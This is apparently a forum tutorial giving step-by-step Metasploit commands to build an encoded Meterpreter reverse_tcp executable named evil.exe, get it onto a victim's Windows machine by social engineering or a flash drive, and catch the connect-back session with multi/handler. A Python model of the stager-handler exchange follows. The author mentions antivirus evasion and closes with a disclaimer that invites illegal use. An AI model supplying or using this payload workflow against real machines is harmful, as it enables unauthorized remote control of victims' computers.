Hello all, I was browsing the tutorials section and didn't see anything that mentioned Metasploit, so I took it upon myself to write one. This isn't too horribly in depth, and no, I do not know everything there is to know about Metasploit or how it works, I just know how to use it. So, let's get started, shall we!
What exactly is Metasploit? Metasploit is a framework for storing, developing, and launching exploits. An exploit is code that abuses a flaw in another program so that the attacker (you) can run code of their choosing on the victim's computer; the code that actually runs on the victim once the flaw is triggered is called the payload. The framework also ships with a handy companion tool known as msfpayload.
What is msfpayload? msfpayload is used in conjunction with msfcli and msfencode. Together they let you build a standalone file that connects back to your computer, encode that file, and start a listener for it. (In current Metasploit releases msfpayload and msfencode have been merged into a single tool, msfvenom, which does both jobs.) This approach does away with the need for an exploit against a vulnerable service, but it takes social engineering to get your file onto the target's computer and get them to run it (or sneaking a flash drive in while they're not looking and running it for them, which I don't recommend). Sounds great, right? So how do you do it?
||Tutorial starts here|| I will be using Backtrack 5 R3, and using msfconsole.
To start, update Metasploit by opening a terminal and running "msfupdate". It prints "Updated to revision #####" when it finishes.
Now run "msfconsole" (it takes a few moments to load).
After it shows the banner you get the prompt "msf >".
Type "show payloads" to list every payload available. We are going to use windows/meterpreter/reverse_tcp. This is a staged payload: the small stager that ends up in evil.exe only knows how to connect back to you, and the handler then sends it the rest of Meterpreter over that connection.
Type "use windows/meterpreter/reverse_tcp" to select that module, then type "info" to see which options are required and other useful information.
There are three options: EXITFUNC, LHOST, and LPORT. EXITFUNC controls how the payload cleans up when it exits (process, thread, seh or none); the default, process, is right for a standalone exe and we don't need to change it. LHOST is the address the payload connects back to, so it knows where to find you, and LPORT is the port it connects back on. EXITFUNC and LPORT already have defaults (process and 4444) that work fine.
LHOST, on the other hand, does need a value. If you are doing this over your LAN it is just your LAN IP, for example 192.168.2.5. Over the internet you use your public IP and forward the port (LPORT) on your router to the machine that will run the handler. Set it by typing "set LHOST 192.168.2.5". Running "info" again shows LHOST set to the address you entered.
With that in order, type "generate -e x86/shikata_ga_nai -i 30 -t exe -f evil.exe". This encodes the payload 30 times with shikata_ga_nai and writes it out as a Windows executable, evil.exe, in the directory you started msfconsole from (your home folder if you launched it from a fresh terminal). Note that in Metasploit 5 and later the flags changed: the format is now given with "-f exe" and the output file with "-o evil.exe", and the standalone equivalent is "msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.5 LPORT=4444 -e x86/shikata_ga_nai -i 30 -f exe -o evil.exe". Take that file and copy it onto a flash drive.
Now for the second part (much quicker than the first). Back in your terminal, type "back" to return to the top-level msf prompt.
We will use the generic handler to listen for the connection, so type "use exploit/multi/handler" to select that module.
Now set the options. Type exactly the following, in order:
set PAYLOAD windows/meterpreter/reverse_tcp (the payload we generated earlier)
set LHOST 192.168.2.5 (your ip address, whatever that may be)
set LPORT 4444 (the default port, and the one evil.exe was built with; the two must match)
exploit
and the handler is listening. When somebody runs the file we made earlier, it connects back to LHOST:LPORT, the handler answers with the rest of Meterpreter, and you get a session. Type "sessions -l" to list sessions and "sessions -i 1" to interact with the first one. If you want the handler to keep listening in the background for further connections, start it with "exploit -j" instead of "exploit".
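To make the connect-back concrete, here is an added example in Python (written for this write-up, not part of the original tutorial and not Metasploit's own code) that models what exploit/multi/handler and the windows/meterpreter/reverse_tcp stager do on the wire: the stager connects to LHOST:LPORT, the handler replies with a 4-byte little-endian length followed by the stage, and the stager reads exactly that many bytes before handing control to them. The stage here is a constructed placeholder blob, not shellcode, and nothing is executed; the Handler and stager names and the 16 MB sanity bound are my own additions, and the real handler sends the Meterpreter DLL at that point.

```python
"""Toy model of a reverse_tcp handler and its stager (added example, not Metasploit code)."""
import socket
import struct
import threading

# Constructed placeholder stage; a real handler sends the Meterpreter stage here.
STAGE = b"placeholder-stage:" + bytes(range(256)) * 16   # 18 + 4096 = 4114 bytes

MAX_STAGE = 16 * 1024 * 1024   # assumed sanity bound; the real stager trusts the length blindly


def recv_exact(sock, n):
    """Read exactly n bytes, the way the stager loops on recv() until the buffer is full."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before %d bytes arrived" % n)
        buf.extend(chunk)
    return bytes(buf)


class Handler:
    """Toy stand-in for 'use exploit/multi/handler' with a staged reverse_tcp payload."""

    def __init__(self, lhost="127.0.0.1", lport=0, stage=STAGE):
        self.stage = stage
        self.sessions = []        # one dict per connect-back, like 'sessions -l'
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((lhost, lport))   # must match the LHOST/LPORT baked into evil.exe
        self.sock.listen(5)
        self.lport = self.sock.getsockname()[1]   # actual port when lport=0 (ephemeral)
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def _serve(self):
        while True:
            try:
                conn, peer = self.sock.accept()
            except OSError:
                return                    # close() was called
            with conn:
                # Record the session before sending, so the entry exists by the
                # time the stager has received its stage.
                self.sessions.append({"id": len(self.sessions) + 1, "peer": peer})
                # Wire format of the reverse_tcp stager: u32 little-endian length, then the stage.
                conn.sendall(struct.pack("<I", len(self.stage)) + self.stage)

    def close(self):
        self.sock.close()


def stager(lhost, lport):
    """Victim-side half: connect back, read the length, read the stage, return it.
    The real stager would VirtualAlloc() a buffer of that size and jump into the bytes."""
    with socket.create_connection((lhost, lport), timeout=5) as s:
        (length,) = struct.unpack("<I", recv_exact(s, 4))
        if length > MAX_STAGE:
            raise ValueError("implausible stage length %d" % length)
        return recv_exact(s, length)


def demo():
    """Run one connect-back on localhost; returns (session count, stage bytes received)."""
    handler = Handler().start()
    try:
        stage = stager("127.0.0.1", handler.lport)
    finally:
        handler.close()
    return len(handler.sessions), len(stage)


if __name__ == "__main__":
    print("sessions=%d stage_bytes=%d" % demo())
```

Two things worth noticing: EXITFUNC never appears on the wire, it only matters inside the victim process once the stage is running, and nothing in this exchange authenticates either side, so any client that connects to the handler's port is handed the stage, which is exactly why a mismatched LHOST or an unforwarded port yields silence and why handlers for staged payloads are easy to fingerprint from the network.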
||End Tutorial|| Disclaimer: Only use this on YOUR computers; doing this without permission on other people's computers is ILLEGAL. Since I know you're going to ignore that anyway, just phrase your questions in a way that sounds legal. I am not the Metasploit guru; I will attempt to answer questions to the best of my ability, but you are probably better off googling it.
I encoded the file with shikata_ga_nai 30 times, but this will not get past antivirus. There are ways to code it and encrypt it so it will, but we all have our own ways of doing that, and sharing secrets never works.
Hope you enjoy, hope it makes sense, just reply to it if there is anything you think should be changed.
Thanks, corrupted_fear